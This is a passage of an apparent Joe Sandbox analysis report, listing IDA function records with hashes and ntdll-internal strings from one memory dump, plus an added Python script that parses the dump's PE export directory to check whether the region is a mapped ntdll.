• Instruction ID: a85c4d2b021b75bb3faf854defdcd49b176d00d661b4f8519a505343da340536
• Opcode Fuzzy Hash: 9f1a430bb386716f26ff7652420e610e60fb8377574ba4637c02cc86cd747bb9
• Instruction Fuzzy Hash: B9A18C759112299BDB31DF68CC88BEAB7B8EF84710F1041EAEA0DA7251D7359E84CF50
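The strings recovered in the function records above (LdrpInitializeProcess, minkernel\ntdll\ldrinit.c, LdrpDynamicShimModule, RtlGetAssemblyStorageRoot, and the SXS:, ThreadPool: and HEAP: diagnostics) are ntdll's own internal strings, and every record's dump source is marked "based on PE: true". That is consistent with the region at 019B0000 in process 4 holding a mapped copy of ntdll rather than the sample's own code, but strings alone do not prove it. The check a practitioner would want is to parse the .sdmp as an in-memory PE image and read the export directory's DLL name. The script below is an added example, not part of the Joe Sandbox report or its IDA plugin. It assumes the .sdmp is the raw bytes of the mapped region starting at its base (image layout, so RVA equals file offset); the sample image it builds when run without arguments is a constructed stand-in, not the real dump.

```python
"""Identify a Joe Sandbox memory-dump region as an in-memory PE image.

Added illustration, not part of the Joe Sandbox report. Assumptions:
  * the .sdmp file is the raw bytes of the mapped region starting at its
    base (image layout), so every RVA is also a file offset;
  * build_sample_image() is a constructed minimal PE32, not the real dump.
"""
import struct
import sys

# ntdll-internal strings quoted in the function records of the report.
NTDLL_MARKERS = (
    b"LdrpInitializeProcess",
    b"minkernel\\ntdll\\ldrinit.c",
    b"RtlGetAssemblyStorageRoot",
    b"LdrpDynamicShimModule",
    b"RtlDeactivateActivationContext",
)


def _u16(buf, off):
    return struct.unpack_from("<H", buf, off)[0]


def _u32(buf, off):
    return struct.unpack_from("<I", buf, off)[0]


def export_dll_name(image: bytes):
    """DLL name from IMAGE_EXPORT_DIRECTORY.Name, or None if absent/malformed."""
    if len(image) < 0x40 or image[:2] != b"MZ":
        return None
    e_lfanew = _u32(image, 0x3C)
    if e_lfanew + 26 > len(image) or image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    opt = e_lfanew + 24                       # optional header after 20-byte COFF header
    opt_size = _u16(image, e_lfanew + 20)     # SizeOfOptionalHeader
    magic = _u16(image, opt)
    if magic == 0x10B:                        # PE32: data directories at +96
        dd = opt + 96
    elif magic == 0x20B:                      # PE32+: data directories at +112
        dd = opt + 112
    else:
        return None
    if dd + 8 > opt + opt_size or dd + 8 > len(image):
        return None
    exp_rva, _exp_size = struct.unpack_from("<II", image, dd)   # directory entry 0
    if exp_rva == 0 or exp_rva + 40 > len(image):
        return None
    name_rva = _u32(image, exp_rva + 12)      # Name field of the export directory
    if name_rva >= len(image):
        return None
    end = image.find(b"\0", name_rva)
    if end < 0:
        end = len(image)
    return image[name_rva:end].decode("ascii", "replace")


def ntdll_markers_present(image: bytes):
    """Which of the ntdll-internal strings from the records occur in the dump."""
    return tuple(m.decode() for m in NTDLL_MARKERS if m in image)


def looks_like_ntdll(image: bytes) -> bool:
    """Export name says ntdll.dll and at least two of the known strings are present."""
    name = export_dll_name(image)
    return (name is not None and name.lower() == "ntdll.dll"
            and len(ntdll_markers_present(image)) >= 2)


def build_sample_image() -> bytes:
    """Constructed minimal PE32 in memory layout, standing in for a real .sdmp."""
    img = bytearray(0x400)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x80)                    # e_lfanew
    img[0x80:0x84] = b"PE\0\0"
    # Machine=i386, 1 section, no symbols, SizeOfOptionalHeader=0xE0, EXECUTABLE|32BIT
    struct.pack_into("<HHIIIHH", img, 0x84, 0x14C, 1, 0, 0, 0, 0xE0, 0x102)
    opt = 0x98
    struct.pack_into("<H", img, opt, 0x10B)                    # PE32 magic
    struct.pack_into("<I", img, opt + 28, 0x019B0000)          # ImageBase as in the report
    struct.pack_into("<II", img, opt + 96, 0x200, 40)          # export directory RVA/size
    struct.pack_into("<I", img, 0x200 + 12, 0x240)             # export directory Name RVA
    img[0x240:0x24A] = b"ntdll.dll\0"
    blob = b"\0".join(NTDLL_MARKERS[:3]) + b"\0"               # a few of the debug strings
    img[0x300:0x300 + len(blob)] = blob
    return bytes(img)


if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_image()
    print("export name   :", export_dll_name(data))
    print("ntdll markers :", ntdll_markers_present(data))
    print("looks like ntdll:", looks_like_ntdll(data))
```

Run it as `python check_dump.py 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp` against the dump the records cite. If the export name is something other than ntdll.dll, or the PE header is missing because the dump starts mid-image, the region is not a straightforward mapped ntdll and the function records should be read as the sample's own code instead.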
Strings
• Failed to allocated memory for shimmed module list, xrefs: 01A4A10F
• LdrpCheckModule, xrefs: 01A4A117
• minkernel\ntdll\ldrinit.c, xrefs: 01A4A121
Memory Dump Source
• Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
Similarity
• API ID:
• String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
• API String ID: 0-161242083
• Opcode ID: a030d060e53bf86eed5e1dd3788968542520af5a6adf321b7e3c5af85ff6db0e
• Instruction ID: 2a622ce6c386acda95e8ba02ffd1a68de9e9911b45e69b5082f916b298e23065
• Opcode Fuzzy Hash: a030d060e53bf86eed5e1dd3788968542520af5a6adf321b7e3c5af85ff6db0e
                                                                                                                              • Instruction Fuzzy Hash: 5671C074A006059FDB26DF6CDA81BBEB7F4FB88744F18402DE50AE7251E734A942CB50
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                              • API String ID: 0-1334570610
                                                                                                                              • Opcode ID: 424a0df9c0e9732f428287da04d008897d4b7eb7f290b7dd891783904250ab81
                                                                                                                              • Instruction ID: 499b961fa3c8aaa2db5c502d7beabb93294443063fd9c06853b599b1dd886627
                                                                                                                              • Opcode Fuzzy Hash: 424a0df9c0e9732f428287da04d008897d4b7eb7f290b7dd891783904250ab81
                                                                                                                              • Instruction Fuzzy Hash: AD61E170A00305EFDB29CF28C544B6ABBEAFF85305F18855DE5598F286C770E841CB90
                                                                                                                              Strings
                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01A582E8
                                                                                                                              • Failed to reallocate the system dirs string !, xrefs: 01A582D7
                                                                                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 01A582DE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                              • API String ID: 0-1783798831
                                                                                                                              • Opcode ID: d5b970cf7aa751cf610f734eb0b0a651e4feeded188a253d67d318fa0c92046c
                                                                                                                              • Instruction ID: c42ba43b54e29dedb25848cbb5e20003f9fc7fface5faa9f48428b532ed3e51f
                                                                                                                              • Opcode Fuzzy Hash: d5b970cf7aa751cf610f734eb0b0a651e4feeded188a253d67d318fa0c92046c
                                                                                                                              • Instruction Fuzzy Hash: BB413475545701ABD721EB68DD44B5B7BE8FF88B60F00482EF949D3298E7B4D801CB91
                                                                                                                              Strings
                                                                                                                              • @, xrefs: 01A9C1F1
                                                                                                                              • PreferredUILanguages, xrefs: 01A9C212
                                                                                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 01A9C1C5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                              • API String ID: 0-2968386058
                                                                                                                              • Opcode ID: a7a4de6a46fc1a004c20004e8e5c23751e166f792279a1e9e6ebf80515437823
                                                                                                                              • Instruction ID: 4c56a1711b4ba4a640df379ca38429a146576fea08d0b4f818bc66fedc67c9ae
                                                                                                                              • Opcode Fuzzy Hash: a7a4de6a46fc1a004c20004e8e5c23751e166f792279a1e9e6ebf80515437823
                                                                                                                              • Instruction Fuzzy Hash: F9418371E00619FBDF11EBD8C991FEEBBF8AB54710F1440AAE609B7284D7749A84CB50
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                              • API String ID: 0-1373925480
                                                                                                                              • Opcode ID: c439424297b84e7817556116f38f06e6c0ab23eaa76b2c5ac2f8c9ad72a01383
                                                                                                                              • Instruction ID: 71bf8d1764c7be3c04f6d04bd2fe59d1dcdf10dd3008c11f5c69a9341980b3e0
                                                                                                                              • Opcode Fuzzy Hash: c439424297b84e7817556116f38f06e6c0ab23eaa76b2c5ac2f8c9ad72a01383
                                                                                                                              • Instruction Fuzzy Hash: 80412572A047498FEB26DBD9DC40BADBBB8FF99340F18045AD905EB791D7348A01CB51
                                                                                                                              Strings
                                                                                                                              • LdrpCheckRedirection, xrefs: 01A6488F
                                                                                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01A64888
                                                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 01A64899
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                              • API String ID: 0-3154609507
                                                                                                                              • Opcode ID: 43cca8f5bf927d4864d665872ac90e315aac23f8de62056a6e54f9c780b954f4
                                                                                                                              • Instruction ID: 3140d1479d55e4c3075eca20379bcf9a077816cc8aa251064036d8cf3d852d12
                                                                                                                              • Opcode Fuzzy Hash: 43cca8f5bf927d4864d665872ac90e315aac23f8de62056a6e54f9c780b954f4
                                                                                                                              • Instruction Fuzzy Hash: B741CF32A057519FCB22CF68D940A66BBECFF8EA50B0A0669ED49D7251D730E800CB91
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                              • API String ID: 0-2558761708
                                                                                                                              • Opcode ID: 01014fda5b9c84a872af9b60a50e34a052f76957cc2a3c15cc5e32fa2141429b
                                                                                                                              • Instruction ID: 6cde79e474647ff08212aaec63e933a266dca4017b258df189a6f33e557fbd1a
                                                                                                                              • Opcode Fuzzy Hash: 01014fda5b9c84a872af9b60a50e34a052f76957cc2a3c15cc5e32fa2141429b
                                                                                                                              • Instruction Fuzzy Hash: C411CD31716146AFEB29CB18C480B6AB3AAAF8162AF19811DF50ACF252DB30E841C750
                                                                                                                              Strings
                                                                                                                              • LdrpInitializationFailure, xrefs: 01A620FA
                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01A62104
                                                                                                                              • Process initialization failed with status 0x%08lx, xrefs: 01A620F3
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                              • API String ID: 0-2986994758
                                                                                                                              • Opcode ID: 738fe41110167472482141ce4b4ae194381cc86226df9b1df1a8d178bdaf186c
                                                                                                                              • Instruction ID: d08c68a4ad1476670356f9ed2c0802ef688a51ffa3ac005ec4efe588bebe998c
                                                                                                                              • Opcode Fuzzy Hash: 738fe41110167472482141ce4b4ae194381cc86226df9b1df1a8d178bdaf186c
                                                                                                                              • Instruction Fuzzy Hash: 08F02278640708ABEB24E70CCD46F9A3B7CEB80F04F100029FB4477281D2F0A900CA82
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ___swprintf_l
                                                                                                                              • String ID: #%u
                                                                                                                              • API String ID: 48624451-232158463
                                                                                                                              • Opcode ID: dbffcfca558e3c22ce1de84d477125c48c5f4723f796f44fff10b763c921b25a
                                                                                                                              • Instruction ID: 116ebb6ec6ca9488bf261eb8bda1d6b8f8f98ed4d26c21ec1ddd38868a5f0bc2
                                                                                                                              • Opcode Fuzzy Hash: dbffcfca558e3c22ce1de84d477125c48c5f4723f796f44fff10b763c921b25a
                                                                                                                              • Instruction Fuzzy Hash: 9E713D71A0014AAFDB01DF99C990FAEB7F8FF58704F154069EA05E7251EA38EE45CB60
                                                                                                                              Strings
                                                                                                                              • LdrResSearchResource Exit, xrefs: 019EAA25
                                                                                                                              • LdrResSearchResource Enter, xrefs: 019EAA13
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                              • API String ID: 0-4066393604
                                                                                                                              • Opcode ID: 6209d3c88cf36308f19cdc9a697b97b5f898366af521932363762ffb01581e8d
                                                                                                                              • Instruction ID: a6cc4b27f38ad7d05c4c56824cc40b5e8858979d083682b6acbeaca7cad58c4a
                                                                                                                              • Opcode Fuzzy Hash: 6209d3c88cf36308f19cdc9a697b97b5f898366af521932363762ffb01581e8d
                                                                                                                              • Instruction Fuzzy Hash: 9BE16171E00319AFEF22CF99D984BAEBBBABF98310F144526F905E7261D7749940CB50
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: `$`
                                                                                                                              • API String ID: 0-197956300
                                                                                                                              • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                              • Instruction ID: e5fe53fc57322e72315f0d36e5587ec00bbc7c0aaa329babe31dae4309bc569a
                                                                                                                              • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                              • Instruction Fuzzy Hash: 00C1C0312043429BEB25CF28C941B6BBBE5BFC4318F484A2DF696CB291D779D905CB91
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID: Legacy$UEFI
                                                                                                                              • API String ID: 2994545307-634100481
                                                                                                                              • Opcode ID: 1301392d4c3f67cda209453558b061d0c8c19d0e66d2017938abc25131d3aec2
                                                                                                                              • Instruction ID: 40e5f1c4958c09d09e820f385dca471e5dbe5e2b07c2b6f000a9cf15f7ce82e6
                                                                                                                              • Opcode Fuzzy Hash: 1301392d4c3f67cda209453558b061d0c8c19d0e66d2017938abc25131d3aec2
                                                                                                                              • Instruction Fuzzy Hash: B4613AB2E046199FDB55DFA8C940BADFBF5FB48700F14406DEA49EB251D731AA40CB50
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: @$MUI
                                                                                                                              • API String ID: 0-17815947
                                                                                                                              • Opcode ID: 004f3da2bcde88be438558cc65baeb9675909073b877dd248f0c173fc935221c
                                                                                                                              • Instruction ID: 06dd6f589e5a442ca8607f32401de1f1d2885a9f283a4c8d2c546d218b55ae3e
                                                                                                                              • Opcode Fuzzy Hash: 004f3da2bcde88be438558cc65baeb9675909073b877dd248f0c173fc935221c
                                                                                                                              • Instruction Fuzzy Hash: D5510971D0021EAFEF11EFA9CD90BEEBBB9EB58754F10052AE615B7290D6309D05CB60
                                                                                                                              Strings
                                                                                                                              • kLsE, xrefs: 019E0540
                                                                                                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 019E063D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                              • API String ID: 0-2547482624
                                                                                                                              • Opcode ID: b8b013ad5c56ddb253598f994272f3ee7b36384806fa5eeffe85753cf4e791d9
                                                                                                                              • Instruction ID: fb81039238f2ceb96cbf75db728fd1ef13ff88600c7be0ff4cdf1725494abb13
                                                                                                                              • Opcode Fuzzy Hash: b8b013ad5c56ddb253598f994272f3ee7b36384806fa5eeffe85753cf4e791d9
                                                                                                                              • Instruction Fuzzy Hash: 7451ED716007429BC726EF69C5487A3BBE8AF84700F18493EE69E87241E7B0D505CF91
                                                                                                                              Strings
                                                                                                                              • RtlpResUltimateFallbackInfo Enter, xrefs: 019EA2FB
                                                                                                                              • RtlpResUltimateFallbackInfo Exit, xrefs: 019EA309
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                              • API String ID: 0-2876891731
                                                                                                                              • Opcode ID: 86112a5387f4656728c5c50e7e7d634057ca8b4c625d34ef986d053ddc85d41a
                                                                                                                              • Instruction ID: 4a7a0fbc69c9fb64ba960778c4bda008ca5c58f89025e93657b5ff23a58762a4
                                                                                                                              • Opcode Fuzzy Hash: 86112a5387f4656728c5c50e7e7d634057ca8b4c625d34ef986d053ddc85d41a
                                                                                                                              • Instruction Fuzzy Hash: 6E41BE30A04649DFEB16CF59D844B6EBBF4FF84700F1444AAE918DB2A1E3B5DA41CB50
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID: Cleanup Group$Threadpool!
                                                                                                                              • API String ID: 2994545307-4008356553
                                                                                                                              • Opcode ID: d2d9fa9d98954d1b6cb527cdfc0c46a2f1ad11df5f86b12b479be9b279a7f51c
                                                                                                                              • Instruction ID: d8dd8ec3dd2485961a308d773d5a6f9f0e13fbf5ccc54653a4224498d24dacaf
                                                                                                                              • Opcode Fuzzy Hash: d2d9fa9d98954d1b6cb527cdfc0c46a2f1ad11df5f86b12b479be9b279a7f51c
                                                                                                                              • Instruction Fuzzy Hash: 2101DCB2246B80AFE321DF24CE45B2677E8E794B25F058939E66CC7194E334E804CB46
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: MUI
                                                                                                                              • API String ID: 0-1339004836
                                                                                                                              • Opcode ID: f45ec9e88dc7a05bcae0bd5c6ae0d503ca52eebbcb4fb1af1c7f8c950ba2c6fd
                                                                                                                              • Instruction ID: f2d4c34e88dae8d53e5d4bef528b8ebfc2d4ad548fd78546737baa557d1b49b8
                                                                                                                              • Opcode Fuzzy Hash: f45ec9e88dc7a05bcae0bd5c6ae0d503ca52eebbcb4fb1af1c7f8c950ba2c6fd
                                                                                                                              • Instruction Fuzzy Hash: 08827B75E002198FEB26CFA8C988BEDBBF5BF48710F148169E95DAB391D7309941CB50
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 0-3916222277
                                                                                                                              • Opcode ID: 8f0c5a37584c28921307cb8c41f03224e019980753449f47a4abb4c9bebeb50a
                                                                                                                              • Instruction ID: cee76c2411b6b7759a2fdf9d1ce9b637e7c6a51791bd8fe7815484d01ef27436
                                                                                                                              • Opcode Fuzzy Hash: 8f0c5a37584c28921307cb8c41f03224e019980753449f47a4abb4c9bebeb50a
                                                                                                                              • Instruction Fuzzy Hash: A1917371900619BFEB25DF95DD85FAEBBB8EF58750F100065F605AB190D774AD00CBA0
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 0-3916222277
                                                                                                                              • Opcode ID: 2beef990c28f91ae39cf8d1ca3cf59a94eaedcb97b49093ca8d0dcae3eaed10e
                                                                                                                              • Instruction ID: 66d83b8fa9c79eb511ea0749c2b3e6eba763ac94bb19be12b970b07c097bde90
                                                                                                                              • Opcode Fuzzy Hash: 2beef990c28f91ae39cf8d1ca3cf59a94eaedcb97b49093ca8d0dcae3eaed10e
                                                                                                                              • Instruction Fuzzy Hash: 9091AD3290164AFEDF22ABA4DD44FAFBBB9EF85750F140029F605A7250EB749D01CB90
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: GlobalTags
                                                                                                                              • API String ID: 0-1106856819
                                                                                                                              • Opcode ID: 1e4add53e976b3ed2e46881a7a1053da3ccbd2d28f61d60491c6ded9828d14ae
                                                                                                                              • Instruction ID: 3fc4dee03b3b981ab53a018c688d55578d523c3b98c73224bd8ab8a5e6245aa0
                                                                                                                              • Opcode Fuzzy Hash: 1e4add53e976b3ed2e46881a7a1053da3ccbd2d28f61d60491c6ded9828d14ae
                                                                                                                              • Instruction Fuzzy Hash: E871A2B5E0420ADFDF69CF9CD5906EDBBB2BF88710F54812EE909A7245E7309841CB60
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: .mui
                                                                                                                              • API String ID: 0-1199573805
                                                                                                                              • Opcode ID: a2f69833ef169602f3066fcef65b1ecfb863f7712f43c6cb20892a8a5b268ad6
                                                                                                                              • Instruction ID: 02fc5ff335950bac4e963f78aceb8816562a8c7ae87fa2cddfdc72389b040d83
                                                                                                                              • Opcode Fuzzy Hash: a2f69833ef169602f3066fcef65b1ecfb863f7712f43c6cb20892a8a5b268ad6
                                                                                                                              • Instruction Fuzzy Hash: 0F518072D0022ADBDF11EF99D944BAEFBB4AF5CB10F05412AEA15BB240D7349901CBA4
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: EXT-
                                                                                                                              • API String ID: 0-1948896318
                                                                                                                              • Opcode ID: 776f0d5a83e59e8bf386c782382fbd31a8d6257399dcef6f11d413f32a5df77d
                                                                                                                              • Instruction ID: 317280e6e8acbbaa99e41fbafcdd7aa5f796edd605039f781e599bc2321cac05
                                                                                                                              • Opcode Fuzzy Hash: 776f0d5a83e59e8bf386c782382fbd31a8d6257399dcef6f11d413f32a5df77d
                                                                                                                              • Instruction Fuzzy Hash: 54417F72508352ABD711DA75C980B6BBBE8AFC8714F06092DFA8CE7190E674DA04C796
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: BinaryHash
                                                                                                                              • API String ID: 0-2202222882
                                                                                                                              • Opcode ID: 60f4e2e6a2bdde3e9b3ef4338dca8b3c11486f5328342ac739b205fcd3865e44
                                                                                                                              • Instruction ID: 22630c9e2d0eca58bca547d09365c165cf9cd015ee2c6f03acb7a6d7cbe2e91d
                                                                                                                              • Opcode Fuzzy Hash: 60f4e2e6a2bdde3e9b3ef4338dca8b3c11486f5328342ac739b205fcd3865e44
                                                                                                                              • Instruction Fuzzy Hash: DB4184B1D0422DABDB21DB64CD80FDEB77CAB55724F0045A5EB08AB144DB709E88CFA4
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
